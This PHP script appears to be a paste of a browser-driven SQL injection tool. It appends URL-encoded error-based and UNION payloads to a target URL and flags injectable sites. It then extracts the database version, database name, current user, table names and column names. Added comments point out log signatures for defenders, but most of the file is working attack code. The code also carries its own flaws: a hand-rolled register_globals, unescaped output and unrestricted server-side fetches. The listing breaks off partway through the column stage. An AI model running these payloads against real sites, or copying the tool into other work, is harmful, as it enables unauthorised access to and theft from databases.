AZZATSSINS_CYBERSERK

SQLI

Jun 27th, 2016
  1. <?php
// Emitted before html_header() runs, so the <title> precedes the <html> element in the output.
echo "<title>SQLI</title>";


// $a: four URL-encoded error-based probes, appended to the target URL by frame1().
// They differ only in how they close the surrounding SQL context: quote, quote + paren,
// nothing, paren. Each one wraps a CASE WHEN result between the hex markers
// 0x3a6f79753a (":oyu:") and 0x3a70687a3a (":phz:") and relies on the
// COUNT(*) / FLOOR(RAND(0)*2) / GROUP BY construct over INFORMATION_SCHEMA.CHARACTER_SETS
// so that the marked value is reflected in a database error message.
// Detection: the two marker constants, the fixed number 8041 and the
// FLOOR(RAND(0)*2) ... GROUP BY shape are stable strings to match in request logs or WAF rules.
// The array index + 1 becomes the "mode" (1-4) used by the later frames.
$a = array(
'%27%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR',
'%27%29%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM',
'%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
'%29%20AND%20%28SELECT%208041%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20%28CASE%20WHEN%20%288041%3D8041%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609'
);
// $b: UNION-based probes. Each selects NULLs plus one CONCAT of the same two markers around
// the fixed hex string 0x4244764877697569706b ("BDvHwiuipk") and ends with a URL-encoded '#'
// comment. The constant -6863 and that fixed string are further log signatures.
$b = array(
//UNION queries:
'%20-6863%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%2C%20NULL%2C%20NULL%23', //8 columns are selected here (the original comment said "10 cols")
'%20-6863%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23', //10 columns are selected here (the original comment said "8 cols")
'%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%23', //8cols v2
'%20-6863%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%280x3a6f79753a%2C0x4244764877697569706b%2C0x3a70687a3a%29%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23',//6 cols
);
  18.  
  19.  
  20.  
//globals
// $string / $string2: fragments of MySQL error text; $string3: the opening marker the
// probes plant in the response. Only $string3 is read by the detection loops in frame1().
$string= 'You have an error in your SQL syntax';
$string2= 'supplied argument is not a valid MySQL';
$string3= ':oyu:';
$string4= 'dummy request';
// No assignment to $url is visible before this point (the request import below runs later),
// so $url2 is presumably just the literal suffix and the fetch fails silently under '@'.
@$url2 = "$url\")'";
$html = @file_get_contents("$url2");
$pos = strpos($html, $string);


//--------------------------------------------------------------------------------------------------------------


    // Copies every GET, POST and COOKIE parameter into a global variable of the same name
    // (variable-variables, i.e. a hand-rolled register_globals). Any client that can reach
    // this script can therefore overwrite any global defined above, including $a, $b and
    // $string3. Later sources win: COOKIE overrides POST, which overrides GET.
    foreach ($_GET as $key => $val) $$key=htmldecode($val);
    foreach ($_POST as $key => $val) $$key=htmldecode($val);
    foreach ($_COOKIE as $key => $val) $$key=htmldecode($val);
  37.  
  38.    
  39.    
  40. switch (@$frame){
  41.         case 1: frame1(); break;
  42.         case 2: frame2(); break;
  43.         case 3: frame3(); break;
  44.         case 4: frame4(); break;
  45.         case 5: frame5(); break;
  46.         default:
  47.             switch(@$action){
  48.                 default: frameset();
  49.  
  50.             }
  51.         }
  52.  
  53. function htmldecode($str){
  54.     if (is_string($str)){
  55.        if (get_magic_quotes_gpc()) return stripslashes(html_entity_decode($str));
  56.        else return html_entity_decode($str);
  57.     } else return $str;
  58. }
/**
 * Print the opening <html> tag and a <head> with the green-on-black stylesheet.
 *
 * $plus is interpolated into <head> without escaping; every call visible in this
 * listing passes the default empty string.
 */
function html_header($plus=""){
 
echo "
<html>
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">
 
$plus
<style>
   body {
       font-family : Arial;
 
       font-weight : normal;
       color: green;
       background-color: black;
   }
    </style>
</head>
 
";
}
  80.  
  81. //------------------------------------------------------------------------------------------------------------------
  82.  
  83. //Functions for queries and stuffs
  84.  
// Top-level code: runs on every request, before any frame function is called.
// $mode_eb and $url exist here only if a request parameter of that name was imported
// into the global scope by the $$key loops earlier in the file.
// Each branch builds three probe URLs that ask the database for VERSION(), DATABASE()
// and CURRENT_USER(), truncated with MID(...,1,50) and wrapped in the ":oyu:" / ":phz:"
// hex markers. The branches differ only in the context-closing prefix/suffix, matching
// the four entries of $a.
// Detection: the fixed numbers 6722, 6870 and 2525 next to the marker constants identify
// these three requests in access logs.
if(@$mode_eb == 1){
@$version = "$url+%27%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
@$database = "$url+%27%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
@$usuario = "$url+%27%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";


}elseif(@$mode_eb == 2){
@$version = "$url+%27%29%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
@$database = "$url+%27%29%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
@$usuario = "$url+%27%29%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";


}elseif(@$mode_eb == 3){
@$version = "$url+%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
@$database = "$url+%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
@$usuario = "$url+%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";


}elseif(@$mode_eb == 4){
@$version = "$url+%29%20AND%20%28SELECT%206722%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
@$database = "$url+%29%20AND%20%28SELECT%206870%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
@$usuario = "$url+%29%20AND%20%28SELECT%202525%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";



}

    // Server-side fetches of the three URLs; the raw response bodies are kept in globals.
    // When no branch above matched, the variables are undefined and '@' hides the failures.
    @$versio = @file_get_contents("$version");
    @$databas = @file_get_contents("$database");
    @$usuari = @file_get_contents("$usuario");
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  
  121.  
  122.  
  123. function hexEncode($str){
  124.     if(is_null($str)){
  125.     return FALSE;
  126.    }
  127.     $hexStr = "";
  128.      for($i=0;isset($str[$i]);$i++){
  129.        $char = dechex(ord($str[$i]));
  130.        $hexStr .= $char;
  131.      }
  132.       return "0x".$hexStr;
  133.      }
  134. function asciiEncode($str){
  135.       if(!preg_match("/^0x[A-Fa-f0-9]+/",$str)){
  136.        return FALSE;   //Not a hex string
  137.       }
  138.        $str = substr($str,2);
  139.      $asciiString = "";
  140.       for($i=0;isset($str[$i]);$i+=2){
  141.        $hexChar = substr($str,$i,2);
  142.         $asciiString .= chr(hexdec($hexChar));
  143.       }
  144.    return $asciiString;
  145.   }
  146. function GetBetween($content){
  147.     $r = explode(":oyu:", $content);
  148.     if (isset($r[1])){
  149.         $r = explode(":phz:", $r[1]);
  150.         return $r[0];
  151.   }
  152.   return '';
  153. }
  154.  
  155. function mode_comaprison_eb($detectar_t){
  156.  
  157. if($detectar_t == @$detectar)
  158. {return "vulnerable";}
  159. }
  160. function mode_comaprison_uq($detectar_t){
  161. //UNION query:
  162. if($detectar_t == @$detectar2)
  163. {return "vulnerable";}//10 cols
  164. }
  165.  
  166.  
  167.  
/**
 * Render the outer frameset: frame1 on top, frames 2-4 side by side below.
 * The frame5 line is inside an HTML comment.
 *
 * NOTE(review): $_SERVER['PHP_SELF'] is written into the src attributes without
 * htmlspecialchars(); where the web server passes extra path info through, that
 * value is client-controlled and is reflected into the page.
 */
function frameset(){
   
    html_header();
       
    echo "
   <frameset rows=\"*,25%\" framespacing=\"0\" frameborder=\"0\">
            <frame src=\"".$_SERVER['PHP_SELF']."?frame=1\" name=frame1 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
        <frameset cols=\"33%,*,33%\" framespacing=\"0\" frameborder=\"0\">
           <frame src=\"".$_SERVER['PHP_SELF']."?frame=2\" name=frame2 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
       <frame src=\"".$_SERVER['PHP_SELF']."?frame=3\" name=frame3 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
            <frame src=\"".$_SERVER['PHP_SELF']."?frame=4\" name=frame4 border=\"0\" marginwidth=\"0\" marginheight=\"0\">
       </frameset>
        <!--    <frame src=\"".$_SERVER['PHP_SELF']."?frame=5\" name=frame5 border=\"0\" marginwidth=\"0\" marginheight=\"0\">!-->
      </frameset>
   ";
    echo "</html>";
}
/**
 * Frame 1: URL entry form and the detection stage.
 *
 * On submit, every probe in $a and then in $b is appended to the posted URL and fetched
 * with file_get_contents(), i.e. the requests leave from the server hosting this script,
 * not from the operator's browser. A response containing the ":oyu:" marker ($string3)
 * is reported as injectable.
 *
 * Defensive notes:
 * - One submit produces up to eight GET requests against the target, each carrying the
 *   marker constants described at $a / $b.
 * - No stream context or user_agent setting appears in this file; PHP's http wrapper
 *   sends no User-Agent header unless one is configured, which is an additional log signal.
 * - Fetching http URLs this way depends on allow_url_fopen being enabled on the host.
 * - The posted URL is not restricted to any scheme or host and is echoed back unescaped.
 */
function frame1(){
            global $string2, $string, $string3, $pos, $url2, $html, $mode_eb, $a, $b;
             global $action, $detectar_t;
    html_header();
     echo "<body>\n";

   

echo "
<center>
<tr><td>
 
<center>
<form action=\" ".$_SERVER['PHP_SELF']."?frame=1\" method=\"post\" name=\"forma\" id=\"forma\">
url: <input type=\"text\" name=\"url\" id=\"url\" size=\"65\"/>
<input type=\"submit\" name=\"forma\" id=\"form\" value=\"search\"/>
</form>
</center>
";

if(isset($_POST['forma']) && $_POST['forma']=='search')
{

    $url = $_POST["url"];
    echo "Testing: $url<br><br>";

        // $as tracks the 1-based index of the probe in $a; the last index that produced
        // a marker is kept as $mode_eb.
        $as=1;
        foreach($a as $detectar){

        // Probe is joined to the URL with a literal '+'.
        $url3 = "$url+$detectar";
        @$html2 = file_get_contents("$url3");

        // strpos() == true holds only for a match at offset 1 or later.
        if(strpos($html2, @$string3)==true)
        {
            // Result of the comparison helper is not used (empty body).
            if(mode_comaprison_eb($detectar) == "vulnerable"){

            }
        $mode_eb = $as;
       
        echo "<font color=blue>Detected: ERROR BASED inyection =)</font> <br>QUERY: <font size=2 color=red>$detectar</font><br><br>";
        @$eb_i = 1;
       
        }
        $as++;
       
        }
        // When any error-based probe matched, offer the next stage: a form that posts the
        // URL and the mode number (field "lol") to frame 2.
        if (@$eb_i ==1){
                echo "
                <center>
    <form action=\"".$_SERVER['PHP_SELF']."?frame=2\" method=\"post\" target=\"frame2\" name=\"tablas\" id=\"tablas\">
    <input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
    <input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>
    <input type=\"submit\" name=\"tablas\" id=\"tablas\" value=\"GET Exploit\"/>
   
    </form>
    </center>
    ";}

        // Same check with the UNION probes; a hit is only reported, no follow-up form is built.
        foreach($b as $detectar2){
        $url6 = "$url+$detectar2";
        @$html8 = file_get_contents("$url6");  
       
        if(strpos(@$html8, @$string3)==true){
            if(mode_comaprison_uq($detectar2) == "vulnerable"){
                }
           
        echo "<center><font color=blue>Detected: UNION query inyection =)</font> <br>QUERY: <font size=2 color=red>$detectar2</font><br><br></center>";
        $uq_i = 1;
        }      
       
        }
        // Unset flags compare equal to 0 here, so this fires when neither loop matched.
        if((@$eb_i == 0) && (@$uq_i==0))
        {
        echo "<center><br><font color=red>No injection point founded =(</font><br><br></center>";
        }


}
     echo "</body>\n</html>";  

}
/**
 * Frame 2: table enumeration stage.
 *
 * Reads the target URL and the mode number (POST field "lol") sent by frame 1, requests
 * COUNT(*) of INFORMATION_SCHEMA.TABLES for the current schema, then issues one request
 * per table using LIMIT $i,1 and lists the returned names in a <select>.
 *
 * Defensive notes:
 * - On the target this shows up as a burst of near-identical requests from one source
 *   that differ only in the LIMIT offset; the fixed numbers 3830 (count) and 7288 (names)
 *   plus the ":oyu:" / ":phz:" hex markers identify them.
 * - The mode value is taken from the request without validation; for values other
 *   than 1-4 the payload variables stay undefined.
 * - Text taken from the remote response ($num) and the posted URL are written into
 *   the page without escaping, so the responding server controls markup rendered here.
 */
function frame2(){
    html_header();
global $string2, $string, $string3, $pos, $url2, $html;
global $action, $detectar_t;

if(isset($_POST['tablas']) && $_POST['tablas']=='GET Exploit')
{
   

    $url = $_POST["url"];
    $mode_eb = $_POST["lol"];
   
// Table-count request, one variant per context-closing mode.
if ($mode_eb==1){
    @$tablas2 = "$url+%27%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    }
elseif ($mode_eb==2){
    @$tablas2 = "$url+%27%29%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    }
elseif ($mode_eb==3){
    @$tablas2 = "$url+%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    }
elseif ($mode_eb==4){
    @$tablas2 = "$url+%29%20AND%20%28SELECT%203830%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    }
$tabla = @file_get_contents("$tablas2");   


    $i = -1;  
     
     
echo "
    <form action=\"".$_SERVER['PHP_SELF']."?frame=3\" target=\"frame3\" method=\"post\" name=\"columnas\" id=\"columnas\">
    <input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
    <select name=\"num\" id=\"num\>";
    // One request per iteration; the loop bound is the count extracted from the first response.
    while ($i <= (GetBetween($tabla)-1)):
   
        if($mode_eb == 1){
        @$_tablas = "%27%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
}elseif($mode_eb == 2){
        @$_tablas = "%27%29%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
}elseif($mode_eb == 3){
        @$_tablas = "%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
}elseif($mode_eb == 4){
        @$_tablas = "%29%20AND%20%28SELECT%207288%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20%3D%20DATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
}
    $nums_tablas = "$url+$_tablas";
   
    // The full request URL is printed into the page for every iteration.
    echo $nums_tablas;
    $n_tabla = file_get_contents("$nums_tablas");
   
    // Option label is the raw name from the response; the value is its hexEncode() form,
    // which frame 3 receives as POST field "num".
    $num = GetBetween($n_tabla);
    echo "<option value=\"".hexEncode($num)."\">$num</option>";
    $i++;
    endwhile;

    echo "</select>";
    echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>";
    echo "  <input type=\"submit\" name=\"columnas\" id=\"columnas\" value=\"columns\"/>";
    echo "<form>";

}
//STILL PLAYING WITH UNION QUERIES


    }
/**
 * Frame 3: column enumeration stage for the table chosen in frame 2.
 *
 * Reads the URL, the hex-encoded table name (POST field "num") and the mode ("lol"),
 * requests COUNT(*) of INFORMATION_SCHEMA.COLUMNS for that table, then issues one
 * request per column using LIMIT $i,1 and lists the names in a <select>.
 *
 * Defensive notes:
 * - Log signature: INFORMATION_SCHEMA.COLUMNS with table_name= followed by a 0x... hex
 *   literal, the fixed numbers 1906 (count) and 5724 (names), and the marker constants.
 * - $table_n is placed into the outgoing query text exactly as posted.
 * - Column names from the remote response ($num2) are echoed into the page unescaped.
 */
function frame3(){
html_header();
global $string2, $string, $string3, $pos, $url2, $html;
global $action, $detectar_t;


if(isset($_POST['columnas']) && $_POST['columnas']=='columns')
{
    $url = $_POST["url"];
    $table_n = $_POST["num"];
    $mode_eb = $_POST["lol"];
   
        // Column-count request, one variant per context-closing mode.
        if($mode_eb == 1){
@$columna = "$url+%27%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";       
}elseif($mode_eb == 2){
@$columna = "$url+%27%29%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
}elseif($mode_eb == 3){
@$columna = "$url+%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
}elseif($mode_eb == 4){
        @$columna = "$url+%29%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
}
   



   
    @$column = @file_get_contents("$columna");
   
   
   

// asciiEncode() turns the posted hex literal back into the plain table name for the
// hidden field "dz" that frame 4 reads.
echo "
    <form action=\"".$_SERVER['PHP_SELF']."?frame=4\" target=\"frame4\" method=\"post\" name=\"datas\" id=\"datas\">
    <input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
    <input type=\"hidden\" name=\"dz\" id=\"dz\" value=\"".asciiEncode($table_n)."\"/>";
    $i = 0;
   
    echo"<select name=\"num2\" id=\"num2\">";
    // One request per column, bounded by the count extracted from the first response.
    while ($i <= GetBetween($column)-1):
        if($mode_eb == 1){
            @$_column = "%27%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    }elseif($mode_eb == 2){
